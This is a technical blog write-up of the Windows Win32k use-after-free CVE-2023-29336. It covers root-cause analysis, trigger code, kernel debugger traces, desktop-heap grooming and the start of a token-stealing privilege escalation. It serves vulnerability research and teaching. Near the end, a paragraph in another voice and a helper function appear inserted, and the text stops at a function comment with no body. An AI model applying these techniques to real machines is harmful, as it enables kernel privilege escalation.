Win32k that we lost. A detailed writeup of CVE-2023-29336

Posted on Mar 28, 2025

Introduction

This article was originally written almost two years ago, and I have finally found the time to translate and publish it properly. Enjoy this story of exploiting Win32k at a time when it still didn’t have a garbage collector. Who knows, maybe by the time you’re reading this, Win32k has finally been rewritten in Rust. This exploit wouldn’t have been possible without the article by NumenCyber, which provided key insights into the menu layout needed to build a reliable trigger. All experiments were performed on a fairly old Windows 10 1607 build, 10.0.14393.5850 amd64.

Patchdiff

I took the files for patch diffing from WinBinIndex. The following table shows what we are actually going to compare.

Filename	Hash	Version
win32kfull.sys	827B4223666871A7FE7274F97EECB74AFB380E41	Win10-1607-x8664 (April 2023)
win32kbase.sys	8FFEF7F7E2BFB01619E58CD52486283316AA3E7A	Win10-1607-x8664 (April 2023)
win32k.sys	23F88CD6E2541CB54D77809B840F41532E3277B3	Win10-1607-x8664 (April 2023)
win32kfull.sys	DF3D021A84B13A74182C993E982E27B16C38F9C1	Win10-1607-x8664 (May 2023)

The comparison produced by BinDiff for win32kfull is quite clear: only one function has changed.

BinDiff comparison results

Root Cause Analysis

The vulnerable function is xxxEnableMenuItem. Inside it, a callback is issued without first taking a reference to the tagMENU object returned by the MenuItemState function. That lets an attacker reach a Use-After-Free condition.

Decompiled text of xxxEnableMenuItem before patch and after

Before we dive into the deep technical details, let’s discuss the problem with callbacks in general. Callback functions are a common programming pattern that provides extensibility by letting user-defined functions execute at specific extension points of a general algorithm (the main logic). However, this pattern introduces challenges, especially around trust and ownership of shared resources, both before the callback is invoked and after control returns to the main execution flow. These challenges become even more complex when callbacks cross trust boundaries, such as transitions between kernel and user mode, or across a network.

How callbacks work

There are several ways to mitigate these risks: creating a separate copy of the state to pass into the callback (and avoiding reuse in the main logic), using reference counting, resource locking, and more. Each method has its trade-offs in terms of complexity, performance, and safety.

In this case, the tagMENU type supports reference counting. Reference counting is a mechanism that prevents an object instance from being released while it is still in use, that is, as long as some code holds a reference to it. The idea is simple: whenever code begins working with a protected object, it must increment the reference counter; when it is done, it decrements it. The crucial point is that the reference count must stay consistent throughout the object’s entire lifecycle. If the counter gets out of sync, reference counting provides no protection at all.

The main drawback is obvious: if a programmer forgets to increment the reference counter before using the object, then — from the system’s perspective — that code never actually used the object.

When callbacks are involved, this opens up a dangerous scenario. For example, the callback can release the object, then fill the freed memory with a completely unrelated object — all before the original function resumes execution. When the flow returns to the main logic and touches the original pointer again… 💥

That’s a textbook Use-After-Free.


Now you might ask: where is the callback in xxxEnableMenuItem? Right before the spot where the reference counter increment was added. See it now? If not, no worries, I have prepared a quick clarification.

Internally, Microsoft uses specific naming prefixes for their functions, and these often carry special meaning. Most of the time, the prefix reflects the subsystem the function belongs to. But there are other conventions too. One particularly important prefix is xxx, which typically indicates that somewhere inside that function, there is a callback into user mode.

So yes — there is a callback happening inside xxxEnableMenuItem, and the absence of a proper reference count before it is the core of this bug.

That wraps up the root cause of the vulnerability. Now, let’s move on to the exploitation process.

Trigger

First, let’s figure out what the tagMENU structure is and what the MenuItemState function does. After that, we’ll find out how to reach user mode and set everything up to trigger the vulnerability.

What is tagMENU?

tagMENU is an internal structure used by Windows to implement Menu UI. Unfortunately, its memory layout is not officially documented. However, we can find clues from resources like ReactOS and the leaked source code of Windows XP.

After reverse-engineering the actual layout of tagMENU on Windows 10.0.14393.5850 amd64, here’s what it looks like:

struct MyTagMenu_Win10x64_98h
{
    MyHead_win10x64 head;       // 00000000
    MyProcDeskHead  deskhead;   // 0000000C
    __int32         fFlags;     // 00000028
    __int8          gap1[4];    // 0000002C
    __int32         cAllocated; // 00000030
    __int32         cItems;     // 00000034
    __int32         cxMenu;     // 00000038
    __int32         cyMenu;     // 0000003C
    __int8          gap2[8];    // 00000040

    MyTagWnd_win10x64_168h *wnd;     // 00000048
    MyTagItem_Win10x64_98h *rgItems; // 00000050

    __int64 pParentMenusList; // 00000058
    __int32 dwContextHelpID;  // 00000060
    __int32 field_64;         // 00000064
    __int64 dwMenuData;       // 00000068
    __int8 gap3[20];          // 00000070
    __int64 field_84;         // 00000084
    __int64 field_8C;         // 0000008C
    __int32 field_94;         // 00000094
};

What does MenuItemState do?

The MenuItemState function is responsible for locating a specific menu item, typically by its uID. Internally, it uses a recursive helper function called MNLookupItem, which performs the actual lookup.

Here’s a snippet of the MNLookupItem implementation:

MNLookupItem implementation

Reaching the UserMode

The callback into user mode happens inside xxxRedrawTitle, which is called from xxxEnableMenuItem. But to reach that point, several checks in xxxEnableMenuItem must first be satisfied.

The first check is that the menu (passed as the first argument to MenuItemState) must be a system menu. A system menu is retrieved via the API GetSystemMenu.

The second check is whether the menu item identifier, which is returned in the v15 variable, matches one of the system-reserved IDs. These identifiers are typically occupied by default entries in the system menu (like “Restore”, “Move”, “Size”, etc.).

Here’s the trick: there’s no restriction on deleting default menu items. That means we can remove a default menu item and insert our own custom-controlled menu item, placing it wherever we want in the menu tree.

Checks in xxxEnableMenuItem

Now, gathering all prerequisites, we should create the following menu layout:

Menu layout

Why is MenuA the UAF target?

You might be asking: Why is MenuA chosen as the Use-After-Free target?

Let’s look back at the patched code and the implementation of MNLookupItem. The v15 variable holds a pointer to the submenu that contains the menu item with a reserved system ID. That’s why MenuA is the one — it’s the submenu directly referenced by v15.

And here’s the key issue:

MenuA doesn’t have its reference count incremented before the callback is invoked.

Usermode Callback in xxxRedrawTitle

Now let’s look at xxxRedrawTitle. There are three different code paths in this function that allow execution to cross into user mode:

Going down the rabbit hole through xxxDrawCaptionBar
xxxCallHook, which invokes user-mode hooks. Those hooks are set through the SetWindowsHookExA API
xxxSendMessage, which is the simplest and most direct path, and the one I used.

xxxRedrawTitle

To receive the WM_NCUAHDRAWCAPTION message, we need to create a custom WndProc for the window that owns the menu targeted for UAF. That message will be dispatched to the window procedure during the redraw, allowing us to execute code in the callback — and destroy the menu at exactly the right moment.

The code that releases the menu can be seen in the snippet below:

LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch(msg) {
        case WM_NCUAHDRAWCAPTION: {
            
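            // WPARAM and LPARAM are 64-bit on amd64, so print them with %llx
            wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%llx lParam=%llx\n", (unsigned long long)wParam, (unsigned long long)lParam);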

            for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) {
                RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION);
            }
            wprintf(L"[+] 5. Destroy Menu\n");
            system("pause");

            DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed
            
            ...

            break;
        }
    }

    return DefWindowProc(hWnd, msg, wParam, lParam);
}

Debugging

Our debugging target is my PoC exploit, available on GitHub.

Let’s start by finding the address of the PoC process and switching context into it:

kd> !process 0 0 poc.exe
PROCESS ffffcc0e6b8f6800 <--> EPROCESS
    SessionId: 1  Cid: 0c30    Peb: 5858bd5000  ParentCid: 014c
    DirBase: 2cf00000  ObjectTable: ffff94044295ad80  HandleCount: <Data Not Accessible>
    Image: poc.exe

kd> .process /i /r ffffcc0e6b8f6800
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g

Because Win32k is not mapped into the system process, we need to run the commands above to switch into the correct session context. Win32k is only mapped into processes that deal with GUI. More details about what’s mapped inside system process can be found in this classic Microsoft article.

Once context is switched, it’s a good idea to reload symbols:

kd> .reload

Set a breakpoint on win32kfull!xxxEnableMenuItem and continue execution:

kd> bp /p ffffc70664bac680 win32kfull!xxxEnableMenuItem
kd> g

Once the breakpoint hits, step through until you reach the call to win32kfull!MenuItemState function. The last argument will contain a pointer to the MenuA instance — the target of our UAF.

kd> p
rax=ffffa0817b949ab0 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c6b0
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac7010196ae rsp=ffffa0817b949a50 rbp=ffffa0817b949b80
 r8=0000000000000002  r9=0000000000000003 r10=fffffa8ac1b5b870
r11=ffffa0817b949aa8 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
win32kfull!xxxEnableMenuItem+0x2a:
fffffac7`010196ae e801010000      call    win32kfull!MenuItemState (fffffac7`010197b4)
kd> ? poi(r11-0x38)
Evaluate expression: -104996992148816 = ffffa081`7b949ab0
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0  00000000`000104af <---> Uninitialized value
kd> p
rax=0000000000000000 rbx=ffffd7d74062a5f0 rcx=0000000000000002
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796b3 rsp=ffffde00877b0a50 rbp=ffffde00877b0b80
 r8=0000000000000000  r9=ffffde00877b0ab0 r10=ffffd7d74062e890
r11=0000000000000003 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
win32kfull!xxxEnableMenuItem+0x2f:
ffffd7aa`3ac796b3 f7432800010000  test    dword ptr [rbx+28h],100h ds:002b:ffffd7d7`4062a618=04000101
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0  ffffd7d7`4062cfe0
kd> db ffffd7d7`4062cfe0
                                           \/
ffffd7d7`4062cfe0  73 00 03 00 00 00 00 00-01 00 00 00 00 00 00 00  s...............
ffffd7d7`4062cff0  00 00 00 00 00 00 00 00-70 1d 45 64 06 c7 ff ff  ........p.Ed....
ffffd7d7`4062d000  e0 cf 62 40 d7 d7 ff ff-01 00 00 00 00 00 00 00  ..b@............
ffffd7d7`4062d010  08 00 00 00 02 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d030  00 e8 62 40 d7 d7 ff ff-50 2d 60 40 d7 d7 ff ff  ..b@....P-`@....
ffffd7d7`4062d040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

In the memory dump above, we can see the reference counter associated with the MenuA object. It’s stored at offset +0x08 from the beginning of the object. The value is currently 1, and we know this value won’t be incremented — meaning the object is vulnerable to being freed while still in use.

Continue stepping until we reach the call to win32kfull!xxxRedrawTitle function. The PoC has already set up all the required conditions — nothing too tricky, just basic Windows API usage.

kd> p
rax=ffffa0817b949a80 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c4a0
rdx=0000000000001000 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac701019758 rsp=ffffa0817b949a50 rbp=0000000000000000
 r8=0000000000000000  r9=ffffa0817b949ab0 r10=fffffa8ac06299a0
r11=0000000000000003 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
win32kfull!xxxEnableMenuItem+0xd4:
fffffac7`01019758 e853e30000      call    win32kfull!xxxRedrawTitle (fffffac7`01027ab0)

Set a hardware breakpoint right after the call, and another one at win32kfull!DestroyMenu, where the MenuA will be freed:

kd> ba e 1 ffffd7aa`3ac7975d
kd> bp /p ffffc70664bac680 win32kfull!DestroyMenu
kd> g

Once the callback runs and attempts to release the menu, the breakpoint on win32kfull!DestroyMenu will fire.

kd> g
Breakpoint 2 hit
rax=0000000000000001 rbx=0000000000000000 rcx=ffffd7d74062cfe0
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000020
rip=ffffd7aa3ac96d20 rsp=ffffde008616de08 rbp=ffffde008616dec0
 r8=0000000000000002  r9=0000000000000040 r10=ffffd7d743d997c0
r11=ffffd7d743d997c0 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kfull!DestroyMenu:
ffffd7aa`3ac96d20 48895c2410      mov     qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616de18=0000000000000000

Step through until you reach win32kbase!HMFreeObject, where RCX still points to MenuA.

rax=0000000000000000 rbx=ffffd7d74062cfe0 rcx=ffffd7d74062cfe0 <------- MenuA
rdx=0000000000000000 rsi=ffffd7d74062e920 rdi=0000000000000000
rip=ffffd7aa3aa3ee20 rsp=ffffde008616ddd8 rbp=ffffde008616dec0
 r8=0000000000000080  r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
win32kbase!HMFreeObject:
ffffd7aa`3aa3ee20 48895c2410      mov     qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616dde8=ffffd7d74062e920

A bit further in, you’ll hit nt!RtlFreeHeap, which actually frees the memory. R8 holds the base address of the freed memory block:

rax=ffffd7d743d99701 rbx=ffffd7d740400ac8 rcx=ffffd7d740600000
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffd7d74062cfe0
rip=ffffd7aa3aa3ef82 rsp=ffffde008616dda0 rbp=ffffde008616de12
 r8=ffffd7d74062cfe0  r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=0000000000000001 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kbase!HMFreeObject+0x162:
ffffd7aa`3aa3ef82 ff1500820f00    call    qword ptr [win32kbase!_imp_RtlFreeHeap (ffffd7aa`3ab37188)] ds:002b:ffffd7aa`3ab37188={nt!RtlFreeHeap (fffff803`4683bfd4)}

Now continue execution until the post-callback hardware breakpoint hits — we’re back inside win32kfull!xxxEnableMenuItem, but MenuA is already freed.

kd> g
Breakpoint 1 hit
rax=0000000000000001 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062a3e0
rdx=ffffd7d740600820 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac7975d rsp=ffffde00877b0a50 rbp=0000000000000000
 r8=ffffd7d740600700  r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
win32kfull!xxxEnableMenuItem+0xd9:
ffffd7aa`3ac7975d 81ff60f00000    cmp     edi,0F060h

After the previously set breakpoint is hit, let’s continue stepping through the code until we reach the call to win32kfull!MNGetPopupFromMenu function.

kd> p
rax=ffffd7d74062a3e0 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062cfe0
rdx=0000000000000000 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796ca rsp=ffffde00877b0a50 rbp=0000000000000000
 r8=ffffd7d740600700  r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kfull!xxxEnableMenuItem+0x46:
ffffd7aa`3ac796ca e835e20100      call    win32kfull!MNGetPopupFromMenu (ffffd7aa`3ac97904)

The RCX register contains the same pointer we observed earlier, right after the call to win32kfull!MenuItemState. Let’s dump the contents of that object again — this time, we’ll see that the memory has changed.

kd> db ffffd7d74062cfe0
ffffd7d7`4062cfe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062cff0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d000  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d010  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d020  41 41 41 41 41 41 40 30-30 30 30 00 00 00 00 00  AAAAAA@0000.....
ffffd7d7`4062d030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

So how did that happen? Our callback didn’t just release the memory — it reclaimed it with controlled data.

Let’s dive into the next question: How do we replace a freed kernel object in memory with controlled data?

Exploit

Heap feng shui

Before diving into the heap feng shui used in this exploit, let’s first revisit some core concepts at a high level.

In Win32k, most GUI-related objects are associated with a specific Desktop. These objects are allocated from a Desktop Heap, which is created during desktop initialization. This heap is managed by the nt heap implementation (RtlpAllocateHeap/RtlpFreeHeap). We can roughly imagine the desktop heap as a list of free memory chunks sorted in ascending order. Each chunk is a fixed-size virtual memory block. When an allocation is made, a chunk is taken from the list; when it’s freed, the chunk is returned to the list.

Key details of the allocator:

RtlpAllocateHeap
- Aligns the requested size to a 16-byte boundary
- Searches for the first chunk in the free list that is large enough
- If the found chunk is larger than needed, it’s split into two. The left part is returned to the caller. The right part is reinserted into the free list
RtlpFreeHeap
- Marks the chunk as freed
- If adjacent chunks (left/right) are also free, they may be coalesced into a single larger chunk

From this behavior, a simple conclusion emerges: Subsequent allocations and deallocations of the same size will almost always reuse the same memory chunk.

This reuse behavior is critical to reliably reclaiming freed objects — and forms the basis of our exploitation strategy.

⚠️ Warning
Obviously, this is an oversimplification. There are many allocator behaviors that may matter in other cases, like LFH (Low Fragmentation Heap), chunk header encoding, randomized selection, etc. But for clarity, I’ve intentionally kept this section as simple as possible.

Before we can act, we need a plan:

Prepare the Desktop Heap, specifically the list of free chunks. We want this list to start with chunks located at controlled or predictable addresses, and with sizes as close as possible to the size of the target object. We’ll refer to these candidate chunks as “seats”.
Allocate the target object in one of those prepared seats. Roughly speaking, we want to “seat” the object into the right place.
Free the target object, creating a hole at a known location.
Reallocate all “seats” with controlled objects to replace the freed object.

Now we have a plan and we are ready to discuss each step in detail.

Heap preparation usually consists of two steps: Heap Normalization and Freeing Selected Chunks.

Allocate a large number of memory chunks to normalize the heap layout. The goal is to make subsequent allocations more predictable — or even strictly sequential.
Allocate another batch of chunks and selectively free some of them using appropriate APIs. Most of the time, we want to avoid freeing adjacent chunks to prevent coalescing. We’re aiming to create isolated free chunks — “the seats” — that will later be used to reclaim the target object.

Before we can prepare any seats, we obviously need to allocate something first. But to do that, we need to answer an important question: What size should our seats be?

The heap allocator (RtlpAllocateHeap) selects the smallest free chunk that fits the aligned allocation size, so the closer our seat size is to the size of the target object, the higher the chance that the chunk will be reused during reallocation. The ideal case, of course, is when the seat size is exactly equal to the aligned size of the target object.

This is a good spot to compute the actual size of the tagMENU chunk. The size of the struct is 0x98, but RtlpAllocateHeap will align it to 0xA0.

Just as a refresher, here’s the typical alignment formula, where n is the alignment (a power of two) and x is the requested size: (size_t)((~(n - 1)) & ((x) + (n - 1)))

Since there’s no direct way to allocate arbitrary chunks in the Desktop Heap, we need to use APIs that internally allocate Win32k objects on that heap. Our goal is to either use an object whose size we can control, or choose an object whose size closely matches the size of the target (tagMENU). Fortunately, Win32k (along with the user-mode Win32 APIs) offers plenty of options. Many exposed APIs lead to object creation in the Desktop Heap:

CreateWindow → allocates a tagWND
CreateMenu → allocates a tagMENU
CreateAcceleratorTable → allocates a tagACCELTABLE
…

To make holes for the target tagMENU object, we’ll use an object allocated by the RegisterClassExW API — which creates a tagCLS structure.

This object is especially useful because we can control its size. By carefully adjusting fields in the WNDCLASSEXW structure — particularly cbClsExtra — we can fine-tune the layout of the resulting tagCLS object, making it a perfect fit for the freed chunk of tagMENU.

On the tested version of Windows (10.0.14393.5850), the size of a tagCLS object with cbClsExtra == 0 is A0h, which almost perfectly matches the size of the tagMENU structure.

However, there’s an important detail about how tagCLS objects are created: Every tagCLS must have a name, specified in the lpszClassName field of the WNDCLASSEXW structure — and that name must be unique.

This name string is also allocated in the same Desktop Heap. As a result, the tagCLS and its name may be allocated in adjacent chunks. When the tagCLS is freed, its associated name is also freed, and the allocator coalesces the two chunks into one larger free block.

This can be a problem: the resulting free chunk might no longer be A0h or B0h, but something larger like D0h or more. That breaks our assumption that the seat will perfectly match the target object’s size — and even small gaps can ruin the exploit.

💥 In practice, this behavior occasionally caused crashes during exploitation.

Fortunately, spraying a large number of allocations helps mitigate the issue by saturating the heap and improving the odds of perfect fits. But it doesn’t eliminate the problem completely.

Problematic heap feng shui

The picture below shows the corresponding situation from the free list’s point of view.

Dump of free list

Now is a good time to highlight the code that actually allocates objects and creates the holes.

This part of the exploit relies on the assumption that the Desktop Heap has already been normalized, meaning that new allocations will be placed into adjacent chunks within the Desktop Heap. That gives us the predictability we need to ensure our freed object — the hole — is exactly where we want it.

Seats preparation

Let’s move on to the next major step: how to fill the freed hole with a new tagMENU object. Strictly speaking, this part isn’t very difficult. Once again, we’ll rely on Win32k APIs. In this case, we’ll use the CreatePopupMenu function.

But as with the tagCLS case, there’s a subtle detail worth pointing out.

A tagMENU object may contain menu items, and memory for those items must be allocated. As you might guess, this memory is allocated on the same Desktop Heap as the tagMENU itself.

In the picture below, you can see how item allocation happens internally:

Allocating memory for tagMENU items

In the picture below, you can see the memory layout after CreatePopupMenu — specifically, where the menu items are allocated:

Allocating memory for tagMENU items as memory layout

Because the holes we created earlier were isolated from surrounding chunks, the tagMENU object itself will be allocated directly into one of those holes. However, the memory for the menu items (rgItems) will be allocated elsewhere — likely in a different free chunk on the Desktop Heap.

This separation is important. It means the menu object lands where we want (replacing the freed target), while its internal data structures won’t intersect with neighboring memory — preserving the integrity of the surrounding heap and improving exploit reliability.

After the trigger (which we’ve already discussed), the vulnerable tagMENU object gets freed. Now it’s time to reclaim that freed memory with something else — something fully under our control.

But what kind of object should we use to replace tagMENU?

We’ll go back to using a familiar structure: tagCLS. However, this time we won’t use the tagCLS structure itself — instead, we’ll target the class name field, lpszAnsiClassName.

As mentioned earlier, this string is allocated on the same Desktop Heap, and unlike the structure itself, we can control every byte at any offset. That makes it a perfect candidate for crafting a fake object layout.

💡 The reason we don’t use the full tagCLS structure here is because we can’t directly control its lower offsets — at least not easily. (Think of APIs like SetClassLongPtr. Spoiler: we’ll use that trick later.)

Let’s summarize everything about the replacement strategy.

To reclaim the freed tagMENU chunk, we need to create a string of exactly 98h bytes, matching the size of the tagMENU. This string must also be unique to satisfy the Win32k requirement that each tagCLS name be unique.

We then use that string as the lpszAnsiClassName field when registering a new tagCLS via RegisterClassExW.

There’s one more subtlety here: Because the tagCLS structure itself is very similar in size to tagMENU, we need to ensure that it doesn’t accidentally land in the freed chunk. So to avoid conflicts and ensure the name string lands there instead, we increase the size of the tagCLS using the cbClsExtra field of the WNDCLASSEX structure.

💡 You might ask — why use lpszAnsiClassName instead of other strings in WNDCLASSEX? For example, lpszMenuName looks controllable too. But here’s the catch: that string isn’t allocated on the Desktop Heap. Instead, it’s allocated using ExAllocatePoolWithQuotaTag, which puts it in pool memory — not what we want.

In the image below, you can see the result: all the previously created holes and the freed tagMENU have been successfully reclaimed with controlled lpszAnsiClassName strings from different tagCLS instances:

Memory layout when tagCLS.lpszAnsiClassName replaced MenuA

In the image below, you can see the code responsible for reclaiming the freed tagMENU chunk with our controlled data.

tagMENU replacement

And here’s the result.

The memory dump below shows the reclaimed object sitting exactly where tagMENU was previously located. You might recognize this from the debugging section near the beginning of the write-up: it’s similar to the overwritten memory dump we saw after the user-mode callback triggered the free:

tagMENU memory dump when object is replaced

That wraps up everything related to heap feng shui and precise memory layout control.

R/W

The final goal of this exploit is to elevate privileges. There are several ways to achieve this, but in this write-up, we’ll use one of the classic techniques: Token Stealing. In simple terms, we want to replace the _TOKEN in the _EPROCESS structure of our current process with the one from the System process (PID 4). This results in our process inheriting the full privileges of the System process.

Notice the semantics of the operation: it’s a replacement.

And replacement can be decomposed into two fundamental operations:

Read: read the _TOKEN pointer from the System _EPROCESS
Write: write that pointer into our own process’s _EPROCESS structure

In this section, we will construct the read and write primitives — the fundamental building blocks of our exploit.

Trick the system

To achieve write capabilities, we’ll once again rely on familiar Win32k objects: tagCLS and tagWND.

The tagCLS structure contains a particularly interesting field called cbClsExtra. This field defines how many extra bytes are reserved after the tagCLS object in memory. This extra space is intended to allow third-party applications to store custom data.

Windows exposes two APIs for accessing this area: GetClassLongPtr and SetClassLongPtr.

These functions allow user-mode applications to read from and write to the memory immediately following the tagCLS object — based on the value of cbClsExtra.

If we manage to manipulate cbClsExtra, we can trick the system into thinking there’s a large amount of extra memory after the object. From there, it’s straightforward to use SetClassLongPtr to perform out-of-bounds writes well beyond the original object boundary — giving us a powerful and flexible write primitive.

So how do we actually trigger the use of the freed object?

We use the vulnerable code as designed: after the execution flow returns from user-mode (where the object was freed and replaced), the kernel continues using the original pointer — now pointing to a fully controlled fake object.

This is the last crucial piece of the puzzle.

At the end of xxxEnableMenuItem, the (now stale) object is passed as an argument to the MNGetPopupFromMenu function. This function performs a search for a corresponding tagPOPUPMENU structure by walking two linked lists stored in the tagMENUSTATE (tagMENUSTATE is stored in UserThreadInfo. UserThreadInfo is reachable through the tagWND that is the parent of the target tagMENU). If the search succeeds, the function returns a pointer to a tagPOPUPMENU instance.

MNGetPopupFromMenu code

After returning from MNGetPopupFromMenu, the object it returns is passed back to xxxEnableMenuItem, and from there it is forwarded as the first argument to the function xxxMNUpdateShownMenu.

Inside xxxMNUpdateShownMenu, only two fields of the returned object are accessed:

spwndPopupMenu
spmenu

Both are read-only at this stage. The spwndPopupMenu field is passed down to xxxScrollWindowEx and xxxInvalidateRect.

xxxScrollWindowEx doesn’t modify anything in spwndPopupMenu, and it eventually reaches the same sink as xxxInvalidateRect: a call to xxxRedrawWindow.

And now comes the crucial part.

Inside xxxRedrawWindow, the spwndPopupMenu object is finally written to: a bitwise OR with the constant 02h is performed at offset +0x120 into the structure.

Here is the relevant disassembly:

Assembly code of write operation

And the corresponding pseudocode:

Pseudo code of write operation

This gives us exactly what we need.

By crafting the fake object so that spwndPopupMenu + 120h lands on the cbClsExtra field of our target tagCLS structure, we can cause the system to OR that value with 02h. As a result, cbClsExtra becomes larger than it originally was.

And that gives us what we want — the ability to use SetClassLongPtr to write well beyond the original bounds of the tagCLS structure, turning it into a write primitive. It’s not yet a fully arbitrary write — but we’ll address that in the next step.

To set the field_120 pointer (used in the write operation) to point to the cbClsExtra field in our fake tagCLS object, we first need to know its kernel address. Without it, we can’t correctly position the write or extend our primitive.

To solve this, we’ll use a well-known but effective technique based on HMValidateHandle, an internal, unexported function of user32.dll.
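The article does not show how HMValidateHandle is located. A commonly described approach, assumed here, is to scan the start of the exported user32!IsMenu for its first `call rel32` (opcode E8) and decode the target. The sketch below shows only that decoding step on a plain byte buffer; `first_call_target` is a hypothetical helper name, and a naive byte scan like this can be fooled by an E8 byte inside another instruction's operand.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scans code[0..len) for the first E8 (call rel32) opcode and returns the
 * absolute call target, assuming code[0] is mapped at address `base`.
 * Returns 0 if no complete call instruction is found. */
uint64_t first_call_target(const uint8_t *code, size_t len, uint64_t base)
{
    for (size_t i = 0; i + 5 <= len; i++) {
        if (code[i] != 0xE8)
            continue;

        int32_t rel;
        memcpy(&rel, &code[i + 1], sizeof(rel));   /* little-endian host assumed */

        /* rel32 is relative to the address of the NEXT instruction. */
        return base + i + 5 + (uint64_t)(int64_t)rel;
    }
    return 0;
}
```

On a real system the buffer would be the first bytes of IsMenu and `base` its address in the process.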

Now it’s time to turn our relative write primitive into a fully arbitrary write.

To do this, we want to create a specific memory layout on the Desktop Heap:

A tagCLS object (we’ll call it the Manager) placed between two tagWND objects
The left tagWND becomes our LeftGuard
The right tagWND becomes our RightGuard

To achieve that, we take the following steps.

1. Create a tagCLS that we’ll use to create tagWND objects. We’ll refer to this class as GuardClass.
2. Allocate 256 tagWND objects using CreateWindowEx and the GuardClass. These windows will populate the heap and help us find sequential placements.
3. Find three tagWND objects that are allocated sequentially in memory. To verify whether they occupy adjacent memory chunks, we use the HMValidateHandle technique. This allows us to leak the kernel addresses of the tagWND instances and check if they are placed contiguously in the Desktop Heap.
   - The first will become the LeftGuard
   - The third will become the RightGuard
   - The second one is freed using DestroyWindow, creating a hole
4. Create a new tagCLS, with a size equal to that of the previously released tagWND. This new class will be allocated into the hole, and becomes our Manager.
5. Release all unused tagWND windows from step 2, keeping only the LeftGuard and RightGuard.
6. Create a new tagWND using the class associated with the Manager. This new window gives us a handle we can use with SetClassLongPtr, tied to the tagCLS in the middle. We’ll refer to this final window as WND Manager.
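The adjacency check described above can be sketched as a search over the leaked addresses. This is a minimal illustration, assuming every window occupies a chunk of the same size (`stride`, heap header included) and that the addresses have already been leaked into an array. `find_adjacent_triple` and its parameters are hypothetical names, not part of the original exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the index of `want` in addrs[], or -1 if it is not present. */
static ptrdiff_t find_addr(const uint64_t *addrs, size_t n, uint64_t want)
{
    for (size_t i = 0; i < n; i++)
        if (addrs[i] == want)
            return (ptrdiff_t)i;
    return -1;
}

/* Looks for three leaked addresses laid out as A, A+stride, A+2*stride.
 * On success stores the indices {left, middle, right} in out[] and returns 1. */
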